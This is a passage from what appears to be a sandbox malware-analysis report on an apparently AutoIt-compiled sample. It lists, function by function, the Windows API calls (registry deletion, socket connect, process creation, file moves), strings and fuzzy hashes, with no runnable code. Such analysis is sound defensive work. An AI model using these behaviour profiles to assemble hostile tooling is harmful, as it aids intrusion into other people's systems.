                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                    • String ID: ,,n$DllGetClassObject
                                                    • API String ID: 753597075-149241901
                                                    • Opcode ID: 7e3ca04929d63511eb0e45fd305357d100a0596bf94e8665907b97e8a7eccf71
                                                    • Instruction ID: 7802ba3ab947740359da2147c69cb758c3ea60f5e47150e87ff6f3c090532ad1
                                                    • Opcode Fuzzy Hash: 7e3ca04929d63511eb0e45fd305357d100a0596bf94e8665907b97e8a7eccf71
                                                    • Instruction Fuzzy Hash: 1E41A2B1600204EFDB05EF54C884A9A7BBAEF46310F1591ADEC0A9F605D7B1DD44CFA0
                                                    Function 006B3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006B466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006B3697,?), ref: 006B468B
                                                      • Part of subcall function 006B466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006B3697,?), ref: 006B46A4
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 006B36B7
                                                    • _wcscmp.LIBCMT ref: 006B36D3
                                                    • MoveFileW.KERNEL32(?,?), ref: 006B36EB
                                                    • _wcscat.LIBCMT ref: 006B3733
                                                    • SHFileOperationW.SHELL32(?), ref: 006B379F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 1377345388-1173974218
                                                    • Opcode ID: 8e4781fb6fc97998cf52247983c0eb58ed05b299e71337d8bdb3fde3fb171905
                                                    • Instruction ID: 061f82555417f56532553d1f63d2b26feeedd2cdabd2d0bb037982e2ef8a2152
                                                    • Opcode Fuzzy Hash: 8e4781fb6fc97998cf52247983c0eb58ed05b299e71337d8bdb3fde3fb171905
                                                    • Instruction Fuzzy Hash: 1D4181B1608345AEC791EF64C451ADFB7E9AF89340F00093EF49AC3251EA34D689C75A
                                                    Function 006D8851 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 109COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006D88DE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID: @U=u$hW
                                                    • API String ID: 634782764-4076565667
                                                    • Opcode ID: cdb885de1261641c12eb5f84a23670bac36834b4e223c3b1411e469841cb8fa2
                                                    • Instruction ID: 5a49170a4dae672b4f2f4c83d0783eec6ce4736cb88b901bfa0dfe7b47ce4ca9
                                                    • Opcode Fuzzy Hash: cdb885de1261641c12eb5f84a23670bac36834b4e223c3b1411e469841cb8fa2
                                                    • Instruction Fuzzy Hash: BB31AE34E00108AEEB249A5CCC5DBF877A7EB05310FA44113FA91EB3E1CA30E9419796
                                                    Function 006D0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 006D0FD4
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006D0FFE
                                                    • FreeLibrary.KERNEL32(00000000), ref: 006D10B5
                                                      • Part of subcall function 006D0FA5: RegCloseKey.ADVAPI32(?), ref: 006D101B
                                                      • Part of subcall function 006D0FA5: FreeLibrary.KERNEL32(?), ref: 006D106D
                                                      • Part of subcall function 006D0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 006D1090
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 006D1058
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                    • String ID:
                                                    • API String ID: 395352322-0
                                                    • Opcode ID: bb7cd100aefdec8e4129e680905883fcba7b389d4828bf9303aa72c12df0a087
                                                    • Instruction ID: 3c43e6c693e985fa9a01750d972e57e986c12fe4dbcc485439f1f6b064ec8091
                                                    • Opcode Fuzzy Hash: bb7cd100aefdec8e4129e680905883fcba7b389d4828bf9303aa72c12df0a087
                                                    • Instruction Fuzzy Hash: D9310C71D01109BFEB159F90DC89EFFB7BDEF09300F10416AE512E6251EA749E859AA0
                                                    Function 006C6173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006C7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006C7DB6
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006C61C6
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006C61D5
                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 006C620E
                                                    • connect.WSOCK32(00000000,?,00000010), ref: 006C6217
                                                    • WSAGetLastError.WSOCK32 ref: 006C6221
                                                    • closesocket.WSOCK32(00000000), ref: 006C624A
                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 006C6263
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 910771015-0
                                                    • Opcode ID: 2c26370c87e8b80e38c9a2f6da851d2a4f1b7d93a57921156722eb4421a35710
                                                    • Instruction ID: eded02ea00e9b7e093532fbe4944446f8caf3601c8929008dfd9334ae0327eea
                                                    • Opcode Fuzzy Hash: 2c26370c87e8b80e38c9a2f6da851d2a4f1b7d93a57921156722eb4421a35710
                                                    • Instruction Fuzzy Hash: 6831A131600108AFDF10AF64CC85FBE77AAEF45711F04402DFD06A7291CB74AD059BA5
                                                    Function 006A8E90 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                      • Part of subcall function 006AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006AAABC
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 006A8F14
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 006A8F27
                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 006A8F57
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$_memmove$ClassName
                                                    • String ID: @U=u$ComboBox$ListBox
                                                    • API String ID: 365058703-2258501812
                                                    • Opcode ID: bf3a72ff4eb700a225066bf56970b51d7a627013c599f845e4342d23b39572da
                                                    • Instruction ID: 3c634703c8237fc19128773688ba14fcf6e34c7a50f30e6f227929599e198251
                                                    • Opcode Fuzzy Hash: bf3a72ff4eb700a225066bf56970b51d7a627013c599f845e4342d23b39572da
                                                    • Instruction Fuzzy Hash: D121D271A05105BEDB14ABB09C45DFEB7ABDF06360F14861EF825972E1DB395C09DA20
                                                    Function 006AF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                    • API String ID: 1038674560-2734436370
                                                    • Opcode ID: f5e19417e8e4fb5e72744a2db165ff1cb22b6c4fa3fec136615a65fc7498a112
                                                    • Instruction ID: 5a4e73fc60d795f69be1bf5dedd408ebba8ae64d7295a8a5618d080bba1005ec
                                                    • Opcode Fuzzy Hash: f5e19417e8e4fb5e72744a2db165ff1cb22b6c4fa3fec136615a65fc7498a112
                                                    • Instruction Fuzzy Hash: 2E21377220461266D220B774AC12EE7739FEF57340F10843DF84586291EB919D42D7AA
                                                    Function 006AB1EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 006AB204
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 006AB221
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 006AB259
                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 006AB27F
                                                    • _wcsstr.LIBCMT ref: 006AB289
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                    • String ID: @U=u
                                                    • API String ID: 3902887630-2594219639
                                                    • Opcode ID: 2e1865e6a950c37f20074faeb2b9ff7b9ccc503ad119a456ea6009e6df019cc3
                                                    • Instruction ID: 08712602d330cadef59ccc9649909584846cfb07a6b4d3269c6d35fe0c45240b
                                                    • Opcode Fuzzy Hash: 2e1865e6a950c37f20074faeb2b9ff7b9ccc503ad119a456ea6009e6df019cc3
                                                    • Instruction Fuzzy Hash: 3A213A31604200BBEB15AB759C05FBF7B9ADF46710F00903FF809CA292EF61CD419A60
                                                    Function 006A9307 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006A9320
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006A9352
                                                    • __itow.LIBCMT ref: 006A936A
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006A9392
                                                    • __itow.LIBCMT ref: 006A93A3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$__itow$_memmove
                                                    • String ID: @U=u
                                                    • API String ID: 2983881199-2594219639
                                                    • Opcode ID: 023e2e0853568ced89d6e0b20040e7e0594ac92f01988fc57df5d33ee58f6c1f
                                                    • Instruction ID: f24a879a113adc8d283205681a9273348ebb98891bd0990bd4834b6bff2469bc
                                                    • Opcode Fuzzy Hash: 023e2e0853568ced89d6e0b20040e7e0594ac92f01988fc57df5d33ee58f6c1f
                                                    • Instruction Fuzzy Hash: B821D631B01204ABDF10AB609C89EEE7BBEEB4A711F148029FD05D72C0D670DD459BA1
                                                    Function 006D75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00651D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00651D73
                                                      • Part of subcall function 00651D35: GetStockObject.GDI32(00000011), ref: 00651D87
                                                      • Part of subcall function 00651D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00651D91
                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 006D7632
                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 006D763F
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 006D764A
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 006D7659
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 006D7665
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                    • String ID: Msctls_Progress32
                                                    • API String ID: 1025951953-3636473452
                                                    • Opcode ID: bc476ecfce83d3da42ee9ce6099d41c5e13883a3febe3b8c5c35e48267367fd6
                                                    • Instruction ID: 0be2a17c5a67b991dfb15aa914aaca1d9801f695da4dbce7c08ee1f22134f3a6
                                                    • Opcode Fuzzy Hash: bc476ecfce83d3da42ee9ce6099d41c5e13883a3febe3b8c5c35e48267367fd6
                                                    • Instruction Fuzzy Hash: 2211B2B2510219BFEF158F64CC85EE77F6EEF08798F014115BA04A61A0DB72DC21DBA4
                                                    Function 006DB635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 006DB644
                                                    • _memset.LIBCMT ref: 006DB653
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00716F20,00716F64), ref: 006DB682
                                                    • CloseHandle.KERNEL32 ref: 006DB694
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseCreateHandleProcess
                                                    • String ID: oq$doq
                                                    • API String ID: 3277943733-3391684421
                                                    • Opcode ID: 5ed428510d5d8e485d9f4cf6d2fb1ce8d5ce5737f49dd2aff1f8fc2d38f4d87a
                                                    • Instruction ID: c98c453e4b86e254e536446737b940f25b31344038af4302bd33b8c6b407e3e1
                                                    • Opcode Fuzzy Hash: 5ed428510d5d8e485d9f4cf6d2fb1ce8d5ce5737f49dd2aff1f8fc2d38f4d87a
                                                    • Instruction Fuzzy Hash: 76F03AB2941300BAE3102769BC06FFB7A9EEB08395F01C025FA09E51D2D7798801C7AC
                                                    Function 0067406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00673F85), ref: 00674085
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0067408C
                                                    • EncodePointer.KERNEL32(00000000), ref: 00674097
                                                    • DecodePointer.KERNEL32(00673F85), ref: 006740B2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                    • String ID: RoUninitialize$combase.dll
                                                    • API String ID: 3489934621-2819208100
                                                    • Opcode ID: 4a110acf9b6eb2d77c80489a96a2e6091e39cfd5d4ea82e4c3909cbe46e5ff93
                                                    • Instruction ID: 999eb28b0f492b195a76c8f48173d781ff10a3871d15279d4ea569ca105166a3
                                                    • Opcode Fuzzy Hash: 4a110acf9b6eb2d77c80489a96a2e6091e39cfd5d4ea82e4c3909cbe46e5ff93
                                                    • Instruction Fuzzy Hash: 2FE09A70982705EBEB119F65EC0DB853AA7BB04742F11D135F102F11E0CBBA4604DA58
                                                    Function 006B64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memmove$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 3253778849-0
                                                    • Opcode ID: 24132d38f82a37ab7f3bdb1bcae677fd77bf2f02b632f77fef73ae5b321cb7ec
                                                    • Instruction ID: 5b48f42101f7ed3473684e012c2e6ccb5d9f8b9305390b0d65efb22d002ca623
                                                    • Opcode Fuzzy Hash: 24132d38f82a37ab7f3bdb1bcae677fd77bf2f02b632f77fef73ae5b321cb7ec
                                                    • Instruction Fuzzy Hash: 9561AC7150065AABDF51EF60CC81EFE37A6AF05308F044918FC595B292EB389D4ACB69
                                                    Function 006D01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                      • Part of subcall function 006D0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006CFDAD,?,?), ref: 006D0E31
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006D02BD
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006D02FD
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 006D0320
                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 006D0349
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 006D038C
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 006D0399
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                    • String ID:
                                                    • API String ID: 4046560759-0
                                                    • Opcode ID: 1f3515f56b8192d846225330d5b54a8ef12a1c7635ca1c5318752553719a8019
                                                    • Instruction ID: eaf9192d78f89e8ae48cda16f995f59327449caf49506dcd9da33e539fd20cb3
                                                    • Opcode Fuzzy Hash: 1f3515f56b8192d846225330d5b54a8ef12a1c7635ca1c5318752553719a8019
                                                    • Instruction Fuzzy Hash: A1516A31508301AFD750EF64D895EAEBBEAFF85314F04491EF846872A2DB31E909CB56
                                                    Function 006D5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMenu.USER32(?), ref: 006D57FB
                                                    • GetMenuItemCount.USER32(00000000), ref: 006D5832
                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 006D585A
                                                    • GetMenuItemID.USER32(?,?), ref: 006D58C9
                                                    • GetSubMenu.USER32(?,?), ref: 006D58D7
                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 006D5928
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountMessagePostString
                                                    • String ID:
                                                    • API String ID: 650687236-0
                                                    • Opcode ID: 43a9abc4788df6e3af2b0d5ce0d1bb2f3af933261d7a7d99e3f8036bc77b67d1
                                                    • Instruction ID: f92d77ee1804403942b47944079f5b7df8219cf650718c3ca1c0695cdb461a54
                                                    • Opcode Fuzzy Hash: 43a9abc4788df6e3af2b0d5ce0d1bb2f3af933261d7a7d99e3f8036bc77b67d1
                                                    • Instruction Fuzzy Hash: C1515E35E01625EFCF11EF64C855AEEB7B6EF48310F14446AE816BB351CB30AE419B94
                                                    Function 006AEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 006AEF06
                                                    • VariantClear.OLEAUT32(00000013), ref: 006AEF78
                                                    • VariantClear.OLEAUT32(00000000), ref: 006AEFD3
                                                    • _memmove.LIBCMT ref: 006AEFFD
                                                    • VariantClear.OLEAUT32(?), ref: 006AF04A
                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 006AF078
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
